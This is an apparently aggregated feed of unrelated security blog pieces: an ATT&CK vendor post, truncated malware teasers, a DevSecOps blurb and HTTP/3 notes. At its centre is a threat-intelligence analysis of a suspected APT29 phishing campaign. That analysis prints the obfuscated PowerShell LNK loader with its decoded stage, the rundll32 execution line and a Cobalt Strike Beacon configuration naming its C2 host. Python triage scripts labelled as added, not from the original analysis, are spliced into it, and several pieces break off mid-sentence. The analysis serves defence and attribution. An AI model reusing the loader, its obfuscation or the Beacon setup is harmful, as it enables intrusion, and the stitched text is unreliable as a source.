McAfee is collaborating closely with MITRE in extending their ATT&CK techniques and aligning our products to show coverage and context based on this framework. Both participants and attendees at the conference agreed that ATT&CK is a necessary component for a viable enterprise security strategy.

At our booth, we demonstrated how we have incorporated ATT&CK into McAfee MVISION Endpoint Detection and Response (MVISION EDR), which is scheduled for Q1 2019 availability. Visitors were impressed with how detection is based on and mapped to the ATT&CK framework, allowing a faster, more consistent process to determine the phases of a threat, assess associated risk, and prioritize response.

With our expanded expertise in EDR, threat intelligence, threat hunting, and the cloud, we have identified multiple opportunities to further our collaboration with MITRE.

We also plan on becoming even more involved with the MITRE ATT&CK community through active participation in practitioners’ forums and events like this conference. We are launching new initiatives to enable us to contribute to the ATT&CK knowledgebase by publishing and sharing our research and learnings about new adversarial techniques, incident response methodologies, and red teaming processes.

If you were unable to attend, you can view videos of the ATT&CK conference sessions on YouTube.

To learn more about MITRE ATT&CK, check out resources that we have published on this topic:

 

[1] Gartner, 2018. “BAS and Red Teams Will Kill the Pentest.” https://blogs.gartner.com/augusto-barros/2018/02/14/bas-and-red-teams-will-kill-the-pentest/.

The post McAfee Leads the Charge to Embrace and Expand the MITRE ATT&CK Framework appeared first on McAfee Blogs.

Thanks for Giving, Emotet!

Emotet – the banking Trojan turned malware delivery platform – has recently been observed altering its behaviour in some interesting ways. After a hiatus of some weeks, we observed Emotet returning in mid-November with upgraded macro obfuscation and formatting.  On 19 November, it began a US-centric Thanksgiving-themed campaign. As many will know this is a departure from the standard financial

Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign

Introduction

  • FireEye devices detected intrusion attempts against multiple industries, including think tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government, and defense contracting.
  • The attempts involved a phishing email appearing to be from the U.S. Department of State with links to zip files containing malicious Windows shortcuts that delivered Cobalt Strike Beacon.
  • Shared technical artifacts; tactics, techniques, and procedures (TTPs); and targeting connect this activity to previously observed activity suspected to be APT29.
  • APT29 is known to transition away from phishing implants within hours of initial compromise.

On November 14, 2018, FireEye detected new targeted phishing activity at more than 20 of our clients across multiple industries.

The attacker appears to have compromised the email server of a hospital and the corporate website of a consulting company in order to use their infrastructure to send phishing emails. The phishing emails were made to look like secure communication from a Public Affairs official at the U.S. Department of State, hosted on a page made to look like another Department of State Public Affairs official's personal drive, and used a legitimate Department of State form as a decoy. This information could be obtained via publicly available data, and there is no indication that the Department of State network was involved in this campaign. The attacker used unique links in each phishing email and the links that FireEye observed were used to download a ZIP archive that contained a weaponized Windows shortcut file, launching both a benign decoy document and a Cobalt Strike Beacon backdoor, customized by the attacker to blend in with legitimate network traffic.

Several elements from this campaign – including the resources invested in the phishing email and network infrastructure, the metadata from the weaponized shortcut file payload, and the specific victim individuals and organizations targeted – are directly linked to the last observed APT29 phishing campaign from November 2016. This blog post explores those technical breadcrumbs and the possible intentions of this activity.

Attribution Challenges

Conclusive FireEye attribution is often obtained through our Mandiant consulting team's investigation of incidents at compromised organizations, to identify details of the attack and post-compromise activity at victims. FireEye is still analyzing this activity.

There are several similarities and technical overlaps between the 14 November 2018 phishing campaign and the suspected APT29 phishing campaign on 9 November 2016, both of which occurred shortly after U.S. elections. However, the new campaign included creative new elements as well as a seemingly deliberate reuse of old phishing tactics, techniques and procedures (TTPs), including using the same system to weaponize a Windows shortcut (LNK) file. APT29 is a sophisticated actor, and while sophisticated actors are not infallible, seemingly blatant mistakes are cause for pause when considering historical uses of deception by Russian intelligence services. It has also been over a year since we have conclusively identified APT29 activity, which raises questions about the timing and the similarities of the activity after such a long interlude.

Notable similarities between this and the 2016 campaign include the Windows shortcut metadata, targeted organizations and specific individuals, phishing email construction, and the use of compromised infrastructure. Notable differences include the use of Cobalt Strike, rather than custom malware; however, many espionage actors do use publicly and commercially available frameworks for reasons such as plausible deniability.

During the phishing campaign, there were indications that the site hosting the malware was selectively serving payloads. For example, requests using incorrect HTTP headers reportedly served ZIP archives containing only the benign publicly available Department of State form. It is possible that the threat actor served additional and different payloads depending on the link visited; however, FireEye has only observed two: the benign and Cobalt Strike variations.

We provide details of this in the activity summary. Analysis of the campaign is ongoing, and we welcome any additional information from the community.

Activity Summary

The threat actor crafted the phishing emails to masquerade as a U.S. Department of State Public Affairs official sharing an official document. The links led to a ZIP archive that contained a weaponized Windows shortcut file hosted on a likely compromised legitimate domain, jmj[.]com. The shortcut file was crafted to execute a PowerShell command that read, decoded, and executed additional code from within the shortcut file.

Upon execution, the shortcut file dropped a benign, publicly available, U.S. Department of State form and Cobalt Strike Beacon. Cobalt Strike is a commercially available post-exploitation framework. The BEACON payload was configured with a modified variation of the publicly available "Pandora" Malleable C2 Profile and used a command and control (C2) domain – pandorasong[.]com – assessed to be a masquerade of the Pandora music streaming service. The customization of the C2 profile may have been intended to defeat less resilient network detection methods dependent on the default configurations. The shortcut metadata indicates it was built on the same or very similar system as the shortcut used in the November 2016 campaign. The decoy content is shown in Figure 1.


Figure 1: Decoy document content

Similarities to Older Activity

This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The malicious LNK used in the recent spearphishing campaign, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), has technical overlaps with a suspected APT29 LNK from November 2016, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d), which was publicly reported by Volexity. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.

Additional overlap was observed in the targeting and tactics employed in the phishing campaigns responsible for distributing these LNK files. Previous APT29 activity targeted some of the same recipients of this email campaign, and APT29 has leveraged large waves of emails in previous campaigns.

Outlook and Implications

Analysis of this activity is ongoing, but if the APT29 attribution is strengthened, it would be the first activity uncovered from this sophisticated group in at least a year. Given the widespread nature of the targeting, organizations that have previously been targeted by APT29 should take note of this activity. For network defenders, whether or not this activity was conducted by APT29 should be secondary to properly investigating the full scope of the intrusion, which is of critical importance if the elusive and deceptive APT29 operators indeed had access to your environment.  

Technical Details

Phishing

Emails were sent from DOSOneDriveNotifications-svCT-Mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org with the subject Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you. The distribution of emails varied significantly between the affected organizations. While most targeted FireEye customers received three or fewer emails, some received significantly more, with one customer receiving 136.

Each phishing email contained a unique malicious URL, likely for tracking victim clicks. The pattern of this URL is shown in Figure 2.


Figure 2: Malicious URL structure

Outside of the length of the sender email address, which may have been truncated on some recipient email clients, the attacker made little effort to hide the true source of the emails, including that they were not actually sent from the Department of State. Figure 3 provides a redacted snapshot of email headers from the phishing message.


Figure 3: Redacted email headers

The malicious links are known to have served two variants of the file ds7002.zip. The first variant (MD5: 3fccf531ff0ae6fedd7c586774b17a2d) contained ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c). ds7002.lnk was a malicious shortcut (LNK) file that contained an embedded BEACON DLL and decoy PDF, and was crafted to launch a PowerShell command. On execution, the PowerShell command extracted and executed the Cobalt Strike BEACON backdoor and decoy PDF. The other observed variant of ds7002.zip (MD5: 658c6fe38f95995fa8dc8f6cfe41df7b) contained only the benign decoy document. The decoy document ds7002.pdf (MD5: 313f4808aa2a2073005d219bc68971cd) appears to have been downloaded from hxxps://eforms.state.gov/Forms/ds7002.PDF.

The BEACON backdoor communicated with the C2 domain pandorasong[.]com (95.216.59[.]92). The domain leveraged privacy protection, but had a start of authority (SOA) record containing vleger@tutanota.com.

Our analysis indicates that the attacker started configuring infrastructure approximately 30 days prior to the attack. This is a significantly longer delay than many other attackers we track. Table 1 contains a timeline of this activity.

| Time | Event | Source |
| --- | --- | --- |
| 2018-10-15 15:35:19Z | pandorasong[.]com registered | Registrant Information |
| 2018-10-15 17:39:00Z | pandorasong[.]com SSL certificate established | Certificate Transparency |
| 2018-10-15 18:52:06Z | Cobalt Strike server established | Scan Data |
| 2018-11-02 10:25:58Z | LNK Weaponized | LNK Metadata |
| 2018-11-13 17:58:41Z | 3fccf531ff0ae6fedd7c586774b17a2d modified | Archive Metadata |
| 2018-11-14 01:48:34Z | 658c6fe38f95995fa8dc8f6cfe41df7b modified | Archive Metadata |
| 2018-11-14 08:23:10Z | First observed phishing e-mail sent | Telemetry |

Table 1: Operational timeline

Execution

Upon execution of the malicious LNK, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), the following PowerShell command was executed:

\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noni -ep bypass
$zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5
rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJE
Vudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W
0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUp
O30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ
1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2en
ZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZC
gkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFy
cmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJL
kdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.E
ncoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;

This command included some specific obfuscation, which may indicate attempts to bypass specific detection logic. For example, it used 'FromBase'+0x40+'String' in place of FromBase64String, the method used to decode base64 in PowerShell.

The decoded command consisted of additional PowerShell that read the content of ds7002.lnk from offset 0x5e2be to offset 0x623b6, base64 decoded the extracted content, and executed it as additional PowerShell content. The embedded PowerShell code decoded to the following:

$ptgt=0x0005e2be;
$vcq=0x000623b6;
$tb="ds7002.lnk";
if (-not(Test-Path $tb))
{
$oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;
if (-not $oe)
{
   exit
}
[IO.Directory]::SetCurrentDirectory($oe.DirectoryName);
}
$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';
$oe=New-Object byte[]($vcq-$ptgt);
$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);
$r=$vzvi.Read($oe,0,$vcq-$ptgt);
$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);
$zk=[Text.Encoding]::ASCII.GetString($oe);
iex $zk;
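
The static triage a defender can run on a launcher like the one above, as an added example (not FireEye's tooling and not code from the sample): it folds PowerShell string-plus-literal concatenation such as 'FromBase'+0x40+'String' and decodes quoted base64 without executing anything. The command line below is constructed with a harmless stand-in payload, and all function names are hypothetical.

```python
import base64
import re

# Constructed, harmless stand-in for a second stage (not the sample's content).
STAGE2 = "$a=0x10;$b=0x20;Write-Output 'constructed sample'"
SAMPLE_CMD = (
    "powershell.exe -noni -ep bypass $zk='"
    + base64.b64encode(STAGE2.encode("ascii")).decode("ascii")
    + "';$fz='FromBase'+0x40+'String';"
    "$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;"
)

# A quoted string followed by one or more "+ 'string'" or "+ integer" operands.
CONCAT = re.compile(r"'[^']*'(?:\s*\+\s*(?:'[^']*'|0x[0-9a-fA-F]+|\d+))+")
PIECE = re.compile(r"'([^']*)'|(0x[0-9a-fA-F]+|\d+)")
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{24,}={0,2})'")
HEX_ASSIGN = re.compile(r"=\s*(0x[0-9a-fA-F]+)")


def fold_concat(cmd: str) -> str:
    """Evaluate 'str'+literal chains the way PowerShell does.

    With a string on the left, PowerShell converts an integer operand to its
    decimal text, so 'FromBase'+0x40+'String' becomes 'FromBase64String'.
    """
    def join(match):
        parts = []
        for text, number in PIECE.findall(match.group(0)):
            if number:
                base = 16 if number.lower().startswith("0x") else 10
                parts.append(str(int(number, base)))
            else:
                parts.append(text)
        return "'" + "".join(parts) + "'"
    return CONCAT.sub(join, cmd)


def triage(cmd: str) -> dict:
    """Summarise what a command line would decode and run, without running it."""
    folded = fold_concat(cmd)
    stages = []
    for blob in B64_LITERAL.findall(folded):
        try:
            stages.append(base64.b64decode(blob, validate=True).decode("ascii"))
        except ValueError:  # not valid base64, or not ASCII text once decoded
            continue
    return {
        # The decoder name only appears after folding: it was split to dodge matching.
        "hidden_decoder": "FromBase64" in folded and "FromBase64" not in cmd,
        "invokes_iex": bool(re.search(r"\b(iex|Invoke-Expression)\b", folded, re.I)),
        "stages": stages,
        # Hex constants assigned in a decoded stage (file offsets in the real loader).
        "hex_constants": [int(h, 16) for s in stages for h in HEX_ASSIGN.findall(s)],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMD).items():
        print(key, "=", value)
```

Matching on the folded text rather than the raw command line is what keeps a rule for FromBase64String effective against this kind of splitting.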

When the decoded PowerShell is compared to the older 2016 PowerShell embedded loader (Figure 4), it's clear that similarities still exist. However, the new activity leverages randomized variable and function names, as well as obfuscating strings contained in the script.


Figure 4: Shared functions to loader in older activity (XOR decode function and CopyFilePart)

The PowerShell loader code is obfuscated, but a short de-obfuscated snippet is shown as follows. The decoy PDF and BEACON loader DLL are read from specific offsets within the LNK, decoded, and their contents executed. The BEACON loader DLL is executed with the export function "PointFunctionCall":

[TRUNCATED]
$jzffhy = [IO.FileAccess]::READ
$gibisec = myayxvj $("ds7002.lnk")
$oufgke = 0x48bd8
$wabxu = 0x5e2be - $oufgke
$lblij = bygtqi $gibisec $oufgke $wabxu $("%TEMP%\ds7002.PDF") Invoke-Item
$((lylyvve @((7,(30 + 0x34 - 3),65,(84 - 5),(-38 + 112),(-16 + 0x25 + 52))) 35))
$oufgke = 0x0dd8
$wabxu = 0x48bd8 - $oufgke
$yhcgpw = bygtqi $gibisec $oufgke $wabxu $("%LOCALAPPDATA%\cyzfc.dat") if
($ENV:PROCESSOR_ARCHITECTURE -eq $("AMD64")) { & ($("rundll32.exe")) $(",")
$("PointFunctionCall") }
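
Because the loader reads its decoy and DLL from fixed offsets inside the LNK, a shortcut carrying data beyond its own structures is worth flagging. The following added example (not FireEye's code) walks the MS-SHLLINK layout and reports any bytes stored after the ExtraData terminal block; it assumes the embedded content is appended there, which the post does not state, and the sample file it builds is constructed with placeholder data.

```python
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields in file order with their LinkFlags bits (MS-SHLLINK).
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40))

ARGS = "-noni -ep bypass constructed"  # constructed argument string
OVERLAY = base64.b64encode(b"constructed placeholder, not a payload. " * 8)


def inspect_lnk(data: bytes) -> dict:
    """Walk the shell link structures and report anything stored after them."""
    try:
        size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
        if size != 0x4C or clsid != LNK_CLSID:
            raise ValueError("not a shell link")
        pos = 0x4C
        if flags & HAS_IDLIST:        # IDListSize does not count its own 2 bytes
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & HAS_LINKINFO:      # LinkInfoSize counts its own 4 bytes
            pos += struct.unpack_from("<I", data, pos)[0]
        width = 2 if flags & IS_UNICODE else 1
        strings = {}
        for name, bit in STRING_FIELDS:
            if flags & bit:
                count = struct.unpack_from("<H", data, pos)[0]
                raw = data[pos + 2:pos + 2 + count * width]
                codec = "utf-16-le" if width == 2 else "cp1252"
                strings[name] = raw.decode(codec, "replace")
                pos += 2 + count * width
        while True:                   # ExtraData blocks, closed by a size below 4
            block = struct.unpack_from("<I", data, pos)[0]
            pos += 4 if block < 4 else block
            if block < 4:
                break
    except struct.error:
        raise ValueError("truncated or malformed shell link") from None
    overlay = data[pos:]
    looks_b64 = bool(overlay) and re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", overlay) is not None
    return {
        "arguments": strings.get("arguments", ""),
        "overlay_offset": pos,
        "overlay_size": len(overlay),
        "overlay_is_base64": looks_b64,
        "suspicious": len(overlay) > 0,
    }


def build_sample(overlay: bytes) -> bytes:
    """Constructed minimal LNK: header, Unicode arguments, terminal block, overlay."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, 0x20 | IS_UNICODE) + bytes(0x4C - 24)
    arguments = struct.pack("<H", len(ARGS)) + ARGS.encode("utf-16-le")
    return header + arguments + struct.pack("<I", 0) + overlay


if __name__ == "__main__":
    print(inspect_lnk(build_sample(OVERLAY)))
    print(inspect_lnk(build_sample(b"")))
```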

Files Dropped

Upon successful execution of the LNK file, it dropped the following files to the victim's system:

  • %APPDATA%\Local\cyzfc.dat (MD5: 16bbc967a8b6a365871a05c74a4f345b)
    • BEACON loader DLL
  • %TEMP%\ds7002.PDF (MD5: 313f4808aa2a2073005d219bc68971cd)
    • Decoy document

The dropped BEACON loader DLL was executed by RunDll32.exe using the export function "PointFunctionCall":

"C:\Windows\system32\rundll32.exe"
C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall

The BEACON payload included the following configuration:

authorization_id: 0x311168c
dns_sleep: 0
http_headers_c2_post_req:
  Accept: */*
  Content-Type: text/xml
  X-Requested-With: XMLHttpRequest
  Host: pandorasong.com
http_headers_c2_request:
  Accept: */*
  GetContentFeatures.DLNA.ORG: 1
  Host: pandorasong[.]com
  Cookie:  __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
jitter: 17
named_pipes: \\\\%s\\pipe\\msagent_%x
process_inject_targets:
  %windir%\\syswow64\\rundll32.exe
  %windir%\\sysnative\\rundll32.exe
beacon_interval: 300
c2:
  conntype: SSL
  host: pandorasong[.]com
  port: 443
c2_urls:
  pandorasong[.]com/radio/xmlrpc/v45
  pandorasong[.]com/access/
c2_user_agents: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko

Network Communications

After successful installation/initialization of the malware, it made the following callback to the C2 server pandorasong[.]com via TCP/443 SSL. The sample was configured to use a malleable C2 profile for its network communications. The specific profile used appears to be a modified version of the publicly available Pandora C2 profile. The profile may have been changed to bypass common detections for the publicly available malleable profiles. The following is a sample GET request:

GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjaehikhmpep
Bdhmoefmcnoiohgkkaabfoncfninglnlbmnaahmhjjfnopdapdaholmanofaoodkiokobenhjd
Mjcmoagoimbahnlbdelchkffojeobfmnemdcoibocjgnjdkkbfeinlbnflaeiplendldlbhnhjmbg
agigjniphmemcbhmaibmfibjekfcimjlhnlamhicakfmcpljaeljhcpbmgblgnappmkpbcko
HTTP/1.1
Accept: */*
GetContentFeatures.DLNA.ORG: 1
Host: pandorasong.com
Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like
Gecko
Connection: Keep-Alive
Cache-Control: no-cache
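
Since the profile was customized, a detection keyed to a single default value is easy to miss; the added example below (not a FireEye rule) scores several independent traits taken from the configuration and GET request above, so a changed Host alone does not evade it. It assumes decrypted request text is available from TLS inspection or a proxy; the requests are constructed, the token is shortened, and the threshold and trait names are hypothetical.

```python
from urllib.parse import urlsplit, parse_qs

PROFILE_PATHS = {"/access/", "/radio/xmlrpc/v45"}  # c2_urls paths from the config above

# Constructed request in the shape of the sample GET; placeholder host.
SAMPLE_REQUEST = (
    "GET /access/?version=4&lid=1582502724&token=ajlomeomnmeapoagcknffjae HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "GetContentFeatures.DLNA.ORG: 1\r\n"
    "Host: c2.example.test\r\n"
    "Cookie: __utma=310066733.2884534440.1433201462.1403204372.1385202498.7;\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

# Constructed benign request that happens to share the /access/ path.
BENIGN_REQUEST = (
    "GET /access/?page=2 HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/63.0\r\n"
    "Cookie: __utma=1.2.3.4.5.6; __utmz=1.2.3; session=abc\r\n\r\n"
)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request head into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def profile_traits(raw: str) -> list:
    """Return the names of the profile traits this request exhibits."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    query = parse_qs(url.query)
    cookies = [c.strip() for c in headers.get("cookie", "").split(";") if c.strip()]
    traits = []
    # A DLNA media header next to a browser User-Agent is an unusual pairing.
    if ("getcontentfeatures.dlna.org" in headers
            and "mozilla/" in headers.get("user-agent", "").lower()):
        traits.append("dlna_header_with_browser_ua")
    if url.path in PROFILE_PATHS:
        traits.append("profile_uri")
    if method == "GET" and {"version", "lid", "token"} <= query.keys():
        traits.append("version_lid_token_query")
    # Heuristic: a single __utma cookie with no companion cookies.
    if len(cookies) == 1 and cookies[0].startswith("__utma="):
        traits.append("lone_utma_cookie")
    return traits


def is_suspect(raw: str, threshold: int = 3) -> bool:
    """Alert only when several independent traits coincide."""
    return len(profile_traits(raw)) >= threshold


if __name__ == "__main__":
    print(profile_traits(SAMPLE_REQUEST), is_suspect(SAMPLE_REQUEST))
    print(profile_traits(BENIGN_REQUEST), is_suspect(BENIGN_REQUEST))
```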

Similarities to Older Activity

Figure 5 and Figure 6 show the overlapping characteristics between the LNK used in the recent spear phish emails, ds7002.lnk (MD5: 6ed0020b0851fb71d5b0076f4ee95f3c), compared to a suspected APT29 LNK from the November 2016 attack that led to the SPIKERUSH backdoor, 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d).


Figure 5: LNK characteristics: new activity (left) and old activity (right)


Figure 6: LNK characteristics: new activity (left) and old activity (right)

In addition to similar LNK characteristics, the PowerShell command is very similar to the code from the older sample that executed the SPIKERUSH backdoor. Some of the same variable names are retained in this new version, as seen in Figure 7 and Figure 8.


Figure 7: Embedded PowerShell: new activity (left) and old activity (right)


Figure 8: Shared string obfuscation logic: new LNK activity (left) and old VERNALDROP activity (right)

Indicators

| Indicator | Description |
| --- | --- |
| dosonedrivenotifications-svct-mailboxe36625aaa85747214aa50342836a2315aaa36928202aa46271691a8255aaa15382822aa25821925a0245@northshorehealthgm[.]org | Phishing email address from likely compromised legitimate server |
| Stevenson, Susan N shared "TP18-DS7002 (UNCLASSIFIED)" with you | Phishing email subject |
| https://www.jmj[.]com/personal/nauerthn_state_gov/* | Malware hosting location on likely compromised legitimate domain |
| pandorasong[.]com | BEACON C2 |
| 95.216.59[.]92 | Resolution of pandorasong[.]com |
| 2b13b244aafe1ecace61ea1119a1b2ee | SSL certificate for pandorasong[.]com |
| 3fccf531ff0ae6fedd7c586774b17a2d | Malicious ZIP archive MD5 |
| 658c6fe38f95995fa8dc8f6cfe41df7b | Benign ZIP archive MD5 |
| 6ed0020b0851fb71d5b0076f4ee95f3c | Malicious LNK file MD5 |
| 313f4808aa2a2073005d219bc68971cd | Benign decoy PDF MD5 |
| 16bbc967a8b6a365871a05c74a4f345b | BEACON DLL MD5 |
| %APPDATA%\Local\cyzfc.dat | BEACON DLL file path |
| %TEMP%\ds7002.PDF | Benign decoy PDF file path |

Table 2: Indicators

Related Samples

37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (MD5: f713d5df826c6051e65f995e57d6817d)

FireEye Detection

FireEye detected this activity across our platform. Table 3 contains the specific detection names that applied to this activity.

| Product | Detection names |
| --- | --- |
| Network Security | Malware.Archive; Malware.Binary.lnk; Suspicious.Backdoor.Beacon |
| Endpoint Security | SUSPICIOUS POWERSHELL USAGE (METHODOLOGY); Generic.mg.16bbc967a8b6a365 |
| Threat Analytics Platform | WINDOWS METHODOLOGY [PowerShell Base64 String]; WINDOWS METHODOLOGY [Rundll32 Roaming]; WINDOWS METHODOLOGY [PowerShell Script Block Warning]; WINDOWS METHODOLOGY [Base64 Char Args]; TADPOLE DOWNLOADER [Rundll Args]; INTEL HIT - IP [Structured Threat Reputation-Based]; INTEL HIT - FQDN [Structured Threat Reputation-Based] [DNS]; INTEL HIT - FQDN [Structured Threat Reputation-Based] [Non-DNS]; INTEL HIT - FILE HASH [Structured Threat Reputation-Based] |

Table 3: FireEye product detections

Over 120 Malicious Domains Discovered in Analysis on New Roaming Mantis Campaign

Since April of this year, news of a rapidly evolving crypto mining malware, dubbed Roaming Mantis, has hit the cyber news headlines. Roaming Mantis debuted with a DNS hijacking attack vector, infecting devices running Android. Once installed, the malware redirected infected devices to phishing sites by spoofing legitimate applications, while using the stolen credentials to run a crypto mining script on PCs.

Quick Take: The Developer’s Role in the Future of Secure Software Development


The State of Software Security Volume 9 offers some of the most dramatic and concrete evidence to date on the positive effect DevSecOps practices have on the state of software security. The data showed consistently that the more an organization scans per year, the faster security fixes are made. The frequent, incremental changes brought forth by DevSecOps make it possible for these teams to fix flaws lightning fast compared to the traditional dev team.

To learn more and read the full report, visit www.veracode.com/soss

Some notes about HTTP/3

HTTP/3 is going to be standardized. As an old protocol guy, I thought I'd write up some comments.

Google (pbuh) has both the most popular web browser (Chrome) and the two most popular websites (#1 Google.com #2 Youtube.com). Therefore, they are in control of future web protocol development. Their first upgrade they called SPDY (pronounced "speedy"), which was eventually standardized as the second version of HTTP, or HTTP/2. Their second upgrade they called QUIC (pronounced "quick"), which is being standardized as HTTP/3.


SPDY (HTTP/2) is already supported by the major web browsers (Chrome, Firefox, Edge, Safari) and major web servers (Apache, Nginx, IIS, CloudFlare). Many of the most popular websites support it (even non-Google ones), though you are unlikely to ever see it on the wire (sniffing with Wireshark or tcpdump), because it's always encrypted with SSL. While the standard allows for HTTP/2 to run raw over TCP, all the implementations only use it over SSL.

There is a good lesson here about standards. Outside the Internet, standards are often de jure, run by government, driven by getting all major stakeholders in a room and hashing it out, then using rules to force people to adopt it. On the Internet, people implement things first, and then if others like it, they'll start using it, too. Standards are often de facto, with RFCs being written for what is already working well on the Internet, documenting what people are already using. SPDY was adopted by browsers/servers not because it was standardized, but because the major players simply started adding it. The same is happening with QUIC: the fact that it's being standardized as HTTP/3 is a reflection that it's already being used, rather than some milestone after which people can start using it.

QUIC is really more of a new version of TCP (TCP/2???) than a new version of HTTP (HTTP/3). It doesn't really change what HTTP/2 does so much as change how the transport works. Therefore, my comments below are focused on transport issues rather than HTTP issues.

The major headline feature is faster connection setup and latency. TCP requires a number of packets being sent back-and-forth before the connection is established. SSL again requires a number of packets sent back-and-forth before encryption is established. If there is a lot of network delay, such as when people use satellite Internet with half-second ping times, it can take quite a long time for a connection to be established. By reducing round-trips, connections get set up faster, so that when you click on a link, the linked resource pops up immediately.

The next headline feature is bandwidth. There is always a bandwidth limitation between source and destination of a network connection, which is almost always due to congestion. Both sides need to discover this speed so that they can send packets at just the right rate. Sending packets too fast, so that they'll get dropped, causes even more congestion for others without improving transfer rate. Sending packets too slowly means suboptimal use of the network.

How HTTP traditionally does this is bad. Using a single TCP connection didn't work for HTTP because interactions with websites require multiple things to be transferred simultaneously, so browsers opened multiple connections to the web server (typically 6). However, this breaks the bandwidth estimation, because each of your TCP connections is trying to do it independently as if the other connections don't exist. SPDY addressed this by its multiplexing feature that combined multiple interactions between browser/server with a single bandwidth calculation.

QUIC extends this multiplexing, making it even easier to handle multiple interactions between the browser/server, without any one interaction blocking another, but with a common bandwidth estimation. This will make interactions smoother from a user's perspective, while at the same time reduce congestion that routers experience.

Now let's talk user-mode stacks. The problem with TCP, especially on the server, is that TCP connections are handled by the operating system kernel, while the service itself runs in usermode. Moving things across the kernel/usermode boundary causes performance issues. Tracking a large number of TCP connections causes scalability issues. Some people have tried putting the services into the kernel, to avoid the transitions, which is bad because it destabilizes the operating system. My own solution, with the BlackICE IPS and masscan, was to use a usermode driver for the hardware, getting packets from the network chip directly to the usermode process, bypassing the kernel (see PoC||GTFO #15), using my own custom TCP stack. This has become popular in recent years with the DPDK kit.

But moving from TCP to UDP can get you much the same performance without usermode drivers. Instead of calling the well-known recv() function to receive a single packet at a time, you can call recvmmsg() to receive a bunch of UDP packets at once. It's still a kernel/usermode transition, but one amortized across a hundred packets received at once, rather than a transition per packet.

In my own tests, you are limited to about 500,000 UDP packets/second using the typical recv() function, but with recvmmsg() and some other optimizations (multicore using RSS), you can get to 5,000,000 UDP packets/second on a low-end quad-core server. Since this scales well per core, moving to the beefy servers with 64 cores should improve things even further.

